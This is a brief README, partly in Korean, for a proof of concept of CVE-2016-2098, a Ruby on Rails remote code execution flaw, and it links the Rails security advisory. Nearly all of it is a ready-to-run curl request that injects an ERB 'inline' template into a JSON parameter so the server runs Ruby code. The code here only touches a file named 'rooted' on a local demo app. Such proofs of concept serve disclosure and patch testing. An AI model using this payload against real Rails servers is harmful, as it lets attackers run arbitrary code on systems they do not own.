
CVE-2016-2098이 원격 코드 실행으로 이어지는 방법을 보여주는 개념 증명
Proof of concept for https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
== 익스플로잇:
rails s를 실행하세요.curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits